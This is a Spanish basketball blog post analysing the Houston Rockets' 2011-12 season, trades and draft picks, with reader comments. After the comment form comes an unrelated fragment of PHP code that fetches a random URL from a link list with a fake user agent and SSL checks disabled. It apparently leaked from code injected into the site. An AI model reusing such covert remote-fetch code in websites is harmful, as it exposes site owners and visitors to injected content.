Houston Rockets: Aprobado

12 de July de 2012 por Sancho88
Los efectos del ‘tifón Ming’ siguen causando estragos en el epicentro del estado de Texas: Houston, la 4º ciudad más poblada de los Estados Unidos. La primera temporada oficial sin el jugador franquicia por excelencia ha dejado un sabor amargo a reinvención mal estructurada y a mala gestión desde los despachos. Cierto es que el equipo estuvo a un paso de alcanzar los Playoffs y que se cumplió al 100% la predicción de Magic en el análisis previo, pero los méritos deportivos quedaron en un segundo plano tras de los deméritos de gestión.

Houston Rockets era una franquicia orgullosa y ganadora en los 90. Desde aquella unión del trío La-la-la (Olajuwon, Drexler y Barkley) los Rockets imponían respeto. Eran ambiciosos y querían el tercer anillo en una década. Un ‘threepeat’ que se les escapó de milagro. 15 años después, la retirada de Yao Ming después de más de un año sin jugar, añadida a la salida del otro buque insignia en los albores del Siglo XXI, Tracy McGrady, sigue siendo un verdadero trauma en el devenir del equipo. Por no hablar del cambio de director en la nave: Adelman por McHale. El ex de aquellos Celtics de Larry Bird no ha sabido imponer disciplina en el vestuario y su liderazgo como entrenador ha quedado en evidencia tras las disputas con Kyle Lowry.

Así, los Rockets parecen haber perdido su identidad y ahora navegan a la deriva. Lo que parecía un proyecto serio que pivotaba en torno a tres figuras claves como Lowry, Kevin Martin y Scola, está a un solo paso de la desintegración total. Todo es adverso en estos momentos en los Rockets, y es imposible verle el punto optimista a todo el asunto. Quizá, los últimos rumores en torno al ‘megatraspaso’ de Dwight Howard ponen algo de emoción de cara a la próxima temporada pero este movimiento ya sería fruto de la casualidad. Si finalmente llega Andrew Bynum proveniente de Los Angeles, deberíamos hablar de intervención divina, no de buena gestión ni merecimientos.

Los Rockets han perdido la dirección, aquella que marcó el estilo de juego durante la temporada. Kyle Lowry y Goran Dragic, que enamoraron gracias a un ritmo de juego ‘Phoenixiano’, ya no están en el equipo. El primero se fue a los Raptors a cambio de Forbes y una futura ronda de draft debido a su mala relación con McHale (muy mal movimiento si tenemos en cuenta que estuvieron a punto de obtener a Tyreke Evans y Thomas Robinson por él), y Dragic volvió precisamente a los Suns, el equipo donde eclosionó en la liga. Era agente libre y los Suns necesitaban a alguien tras la salida de Nash. Dos pérdidas importantes y desafortunadas, aunque no definitivas. Poco podían hacer los Rockets para retenerlos.

Hasta aquí el infortunio, y a partir de aquí  la locura napoleónica. Empecemos por Dalembert, el pívot titular. Fue traspasado a los Bucks a cambio de Leuer, Livingston y Brockman, y un intercambio de primeras rondas en el pasado draft (Jeremy Lamb a los Rockets en el Nº12 y John Henson a los Bucks en el Nº14). El movimiento se interpretó como un acto de fe en pos de liberar espacio salarial para acometer el fichaje de Howard. No obstante, lo de Howard pinta mal, está a un paso de moverse hacia Brooklyn Nets, y en el hipotético caso de ser ‘víctima’ del boikot ‘lakeriano’, veremos si los amarillos se apiadan de estos chicos y les ceden a Pau o Bynum en el nuevo ‘megatraspaso’ del culebrón venezolano ‘Aló mi Supermán’. Al fin y al cabo, los Rockets regalaron a los Lakers en el ‘trade deadline’ un ala-pívot provechoso como Jordan Hill y les quitaron de encima los 5 millones al año de Derek Fisher. Lakers están en deuda moral.

Por último, tampoco sigue Budinger, quien ejerció de 6º hombre en muchos momentos de la temporada. Su salida a los ‘Wolves’ se produjo a cambio del número 18 del pasado draft, con el que los Rockets eligieron a Terrence Jones. Parecen salir ganando. Ahora solo queda un mini núcleo principal con Martin y Scola, desde donde es imposible reconstruir nada sólido para la próxima temporada, un escolta que no soporta la presión y que ni siquiera está claro que continúe como Courtney Lee, y el único resquicio de esperanzas para el futuro: Chandler Parsons. Alrededor de ellos, un sinfín de contratos malos que no quiere nadie y un montón de rondas del draft. Se pueden quedar descompuestos y sin novio estos Rockets. En realidad, es lo que merecen después de tanta volatilidad en los despachos.

Objetivamente los Rockets merecerían el suspenso, pero hay que valorar otras cosas. Nadie puede negarles la ambición y tampoco el buen juego en la cancha durante el año. Lo han intentado todo para tener un equipo con opciones a corto plazo. Primero se frustró el acuerdo con Lakers para forzar la salida de Pau a cambio de Martin, Scola y Dragic. Posteriormente, en la noche del draft, después de ofrecer intercambios de rondas con Raptors y Kings para obtener dos ‘top 10’ y así convencer a los Magic para obtener a Dwight Howard, se quedaron como estaban.

Lo intentaron, pero les salieron mal todas sus jugada, y aún así perseveran y siguen entrando en intercambios futuros. No sé si aprobarles por pesados o mandarles deberes para septiembre. En realidad, deberían sentarse a reflexionar, ver qué tienen y pensar en qué pueden conseguir. Han jugado a crear castillos en el aire, como cantaba Alberto Cortéz, y no les ha salido. Pero en el nuevo intento de encontrar un nuevo Hakeem, se han dejado demasiadas piezas por el camino. Thabeet no jugó absolutamente nada, Dalembert podía cumplir pero arriesgaron con su traspaso, también traspasaron a Camby, no saben si quieren a Pau, a Howard a Bynum o al que les traigan, y están en un momento crucial para el desarrollo de la franquicia en los próximos 5 años. Todo lo que les pase este verano marcará su rumbo para bien o para mal. La reconstrucción es total.

Lo mejor: El carácter admirable de los jugadores en la cancha. Consiguieron la 9º plaza superando ligeramente el 50% de victorias y fueron candidatos a los Playoffs hasta el final. Se quedaron fuera en la batalla personal contra los Jazz, ya que llegaron sin una gota de gasolina al tramo final de la competición. Con Martin lesionado todo el año, el bajón de Scola, el extraño caso del virus de Lowry, etc., bastante hicieron con pelear. Además, Dragic jugó su mejor año en la liga lo que le ha valido un suculento contrato con los Suns (34×4), Parsons apareció como una apuesta fiable en el puesto de alero (debe mejorar físicamente para pegarse en la zona contra los rivales), y McHale consiguió aportar algo de estilo en la cancha. Al menos, el equipo supo a qué jugaba, se pusieron a correr y se encontraron a sí mismos. En el estático pasaban más dificultades y la opción era dársela a Scola en el poste bajo. No puede considerarse decepción quedarse fuera de Playoffs porque tampoco tenían demasiado potencial y no muchos apostaban por ellos en postemporada al comienzo del año. Es más, se les veía como un páramo yermo donde iba a ir a parar Pau Gasol. Nada de eso.

Lo peor: La desesperación en los despachos. Daryl Morley se propuso encontrar al nuevo Olajuwon y realizó demasiados movimientos arriesgados que ya hemos explicado previamente. La sensación de falta de rumbo es preocupante y nadie sabe qué va a ser de estos Rockets la próxima temporada. Como reconstrucción oficial, en teoría tienen pocas opciones de hacer nada a partir de noviembre. Todo cambiaría con la llegada de Bynum o Pau, pero a estas horas el proyecto es totalmente nuevo y los Rockets ya no son contenders.

Jugando al GM:

-Fichaje de Lin. Le han ofrecido 30×4, superando la oferta de los Knicks, que podrían no igualar en los próximos días después de los fichajes de Jason Kidd y Pablo Prigioni. Los Rockets darían un golpe de efecto con el fichaje del jugador asiático, pues tras escaparse Dragic, le ofrecerían un contrato muy parecido al que ha firmado el esloveno en los Suns. Ahora bien, la guasa de todo esto es que los propios Rockets ya le dejaron marchar en diciembre rumbo a Knicks en un movimiento muy madridista. Te regalo al jugador y lo recupero por una millonada. Aplausos. En el puesto de base ahora tienen muchas carencias los Rockets. No parece buena opción renovar a Boykins, ya que fue un parche de cara a meterse en los Playoffs, pero en cambio sí parece un buen movimiento ir a la agencia libre a por Nate Robinson. Estamos en una etapa en la liga en la que todos o casi todos los equipos tienen base titular y reserva, excepto Rockets quizá. Y ahora hay jugadores como Robinson o Calderon sin equipo o que en breve lo estarán. Si no se mueven en este sentido, se quedarían con un anotador inconstante como Toney Douglas (llega al equipo vía traspaso Camby) y con Jeremy Lin si los Knicks no igualan la oferta. Insuficiente a todas luces.

-Buenas apuestas en el draft por completar el ‘backourt’ y reforzar el puesto de alero. Con la llegada de Jeremy Lamb, ahora mismo McHale cuenta con Lee, Lamb y Martin, tres escoltas de muchísimo talento, además de Livingston que no cuenta (los Rockets pueden ejercer sobre él una team option de 3,5 millones, pero no la merece). En principio, el nombre de Kevin Martin está en todas las quinielas para salir. Adelman era su principal valedor, pero McHale no cuenta con él. Es un expiring de calidad que podría venirle bien a Magic o Lakers. Seguro que Morley lo intercambiaría por Pau o Bynum o a los propios Magic para obtener algo en el ‘megatraspaso’. Veremos qué pasa al final con Martin, porque la intención de los Magic en el hipotético traspaso de Howard a LA sería que los propios Rockets se ‘comieran’ el contrato de Turkoglu (tienen espacio suficiente) y les cedieran a Martin. Entonces sí, seguro que les caería a los Rockets algún center de los gordos (Bynum seguramente).

-Las otras dos elecciones del draft fueron Royce White y Terrence Jones. Junto a Parsons completarán un juego de aleros y ala-pívots pequeños de gran nivel. La idea era negociar con ellos y Lamb, además de Lowry, Martin, Marcus Morris y Parsons, para traer a Howard, pero el cuento ha cambiado muchísimo desde la noche del draft. Ahora parece que se quedarán, y hay altas expectativas sobre ellos. Esperemos que no se queden a medias como Patterson, o que no sean la gran decepción como Flynn o Thabeet.

-El traspaso de ‘Samurai’ Camby a los Knicks a cambio de Douglas, Harrelson, Jerome Jordan, dos segundas rondas de 2014 y 2015 y dinero. Los tres no tienen ningún sentido en los Rockets. Douglas será agente libre restringido el año que viene, y podría ser el recambio de Lin en esta temporada. Mientras, Harrelson y Jordan serán agentes libres sin restricciones a partir de 2013. Se pasarán el año en la lista de lesionados.

-Omer Asik será el pívot titular del equipo al firmar 25 millones por tres años. Músculo y defensa desde los Bulls; talento obtuso en ataque. Thibodeau no tiene claro si igualar. A estas horas es prácticamente seguro que no lo hará. Su pareja en la pintura será Donatas Motiejunas. El joven lituano de 20 años se ha decidido a ‘cruzar el charco’. Aparentemente, lo tiene todo. Gran defensa e intimidación, además de una alta IQ en ataque, habilidad de pase, tiro exterior, grandes movimientos al poste bajo, etc. Si gana algunos kilos y se pone fuerte, puede ser una de las sensaciones de la nueva temporada. No obstante, ante la defensa de jugadores NBA puede tener problemas y refugiarse en la línea de 3. Un poco de Ventolín contra la pintura no le vendría mal. Ventolín en forma de pesas.

-El contrato de Luis Scola. Todavía le quedan por cobrar otros 30 millones en los próximos 3 años. No es un súper contrato, pero habría que analizarlo con detenimiento debido al bajón numérico del talentoso ala-pívot argentino. A priori, tampoco sería mala opción seguir apostando por la dupla Scola-Patterson en el puesto de ‘4’, donde también pueden jugar Terrence Jones, John Leuer y Parsons. Oficialmente, Scola está a la venta por los Rockets. No interesa en la reconstrucción, pero podría ser interesante para cualquier equipo de la liga con aspiraciones a algo serio.

-Y recapitulando, a mí me salen muchos jugadores para un solo equipo, así que algunos traspasos más nos esperan en esta gran aventura en la que se ha convertido el despacho de los Rockets. Contratos para todos, parece ser el lema. Agárrense, porque a mí me salen ¡20 jugadores! De estos, cavalmente retiramos a las respectivas ligas de desarrollo a Courtney Fortson y Diamon Simpson. Nos quedan 18, contando con que Knicks y Bulls no igualen las ofertas por Lin y Asik respectivamente. De esos 18, y debido al overbooking, no ejercería la team option sobre Livingston, Leuer y Greg Smith. Nos quedamos en 15. Sí extendería la QO sobre Courtney Lee. Hay espacio salarial y es un jugador muy aprovechable para la reconstrucción.

Así, el equipo quedaría más o menos así:

PG: Jeremy Lin, Toney Douglas.
SG: Kevin Martin, Courtney Lee, Jeremy Lamb.
SF: Marcus Morris, Chandler Parsons, Royce White, Gary Forbes.Ç
PF: Luis Scola, Pattrick Patterson, Jon Brockman, Terrence Jones.
C: Omer Asik, Donatas Motiejunas, Josh Harrelson, Jerome Jordan.

-Obviamente, sobran jugadores como Martin y Scola, que podrían ponerse en el mercado o incluirse en algún traspaso junto a Patterson, Morris o Brockman. La situación es muy complicada y parece que finalmente lo más coherente será entrar en el ‘megatraspaso’ de Howard que tarde o temprano se producirá y renunciar a las rondas del draft + Martin + Scola. Si no, alguna amnistía caerá, algunos serán enviados a la liga de desarrollo, otros serán cortados, etc. Si a cambio de estos 4 o 5 jugadores, logran obtener a Andrew Bynum, la locura de los Rockets acabaría en final feliz, con Bynum arropado por hombres como Lin, Parsons, Asik, Patterson y Motiejunas. No obstante, nada parece tener sentido en este equipo, y no hay por donde cogerlo a pesar de darle muchas vueltas. Jugar a ser Morley está difícil. Él sabrá las locuras en las que se ha metido. Al menos, será gracioso ver cómo soluciona toda esta vorágine de contratos y jugadores. Yo no me lo pierdo.

Comenta

8 comentarios a esta entrada

  1. Vader dice:
    #1

    Muy buen análisis, a ver por donde tiran. Los rumores son que NYK sí que igualaran la oferta por Lin.

    Saludos

      Citar

  2. Nacho dice:
    #2

    Abres la página, vas a comentarios, lees los que te faltan, en este caso los de rumorología (la verdad es que me estáis dando un curso avanzado de contratos NBA, -mid level mediante- y me voy poniendo al día). Luego pinchas en el siguiente comentario del nuevo post (soy torpe en estas lides y creo que es como llego antes) Tiro del ratón para arriba, y cuando veo el tocho que es, me digo… ¡Sancho! ¡Espera, que voy por unas birras y unas tapas para leerlo! Normal que te cabreara aquel post de Esteban…
    Bueno la gracia con elogios ya está hecha. Voy a leerlo.
    P.D. A partir de ahora cuando Melo tenga un examen de los tochos va a decir: ¡Coño, un Sancho!

      Citar

  3. Nacho dice:
    #3

    Plasta, pero bueno. Muy bueno.
    ¿El pobre Lee va a llevar toda su vida el estigma de aquella canasta fallada en las finales?

      Citar

  4. Sancho88 dice:
    #4

    Pues si los Knicks van a igualar por Lin… los Rockets directamente se quedan sin base. Tendrían a Toney Douglas solamente, y supongo que intentarán repescar a Aaron Brooks, pero en realidad son dos bases muy parecidos, chupones y tiradores de rachas inestables… agujero claro en la dirección de los Rockets.

    Sobre Lee, obvio que no se le juzga por aquella bandeja, pero creo que podría haber hecho más en los últimos 10 partidos. Rockets se quedan fuera por dos juegos con respecto a Jazz y Mavericks, tras finalizar con un parcial lamentable de 3-7, y Lee promedió ahí 13 puntos en 30 minutos. Creo que podría haber dado más, sinceramente

    Antes publiqué una respuesta pero se ha perdido, así que si veis dos comentarios parecidos ya sabéis lo que me ha pasado.

    Me alegro mucho de que os haya gustado el post, y lamento que os resulte un poco pesado. Prometo que intentaré moderarme en próximas ocasiones. Saludos!!

      Citar

  5. rumbero dice:
    #5

    No hay nada como un buen análisis de Sancho café en mano justo antes de ponerse a trabajar un ratito. Cortos no son, pero uno se pone al día (y con el máximo de detalle) de como está el equipo en cuestión.
    La verdad es que te miras el roster de los Rockets y echa para atrás y más teniendo en cuenta que Scola y Martin tienen muchos números para irse y los Knicks casi seguro que igualen la oferta por Lin. Vale que quieren iniciar una reconstrucción pero han hecho movimientos de despacho que son un esperpento, como quedarse sin base de garantias. O les cae un regalito en forma de Bynum o van a estar en la cola del oeste durante un tiempecito.

      Citar

  6. Vader dice:
    #6

    Quizas vayan a por Felton que también esta disponible.

      Citar

  7. rojorob dice:
    #7

    Un movimiento muy madridista, sí. Como los fichajes de Gerard, Piqué, Cesc… Ah no, que esos son jugadores de la cantera…

      Citar

  8. Esteban dice:
    #8

    Hablando de martin, si realmente no lo quieren, vendria muy bien en los mavs

    Un equipo mavs, calderon, martin, marion (kirilenko), dirk, kaman
    West, carter, landry? Wright

    No es un super equipo, pero habria material para al menos ilusionarse un poco

    Martin por una trade expection de odom,

    Si houston quiere reconstruir, que mejor que 10 millones menos que pagar este año?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>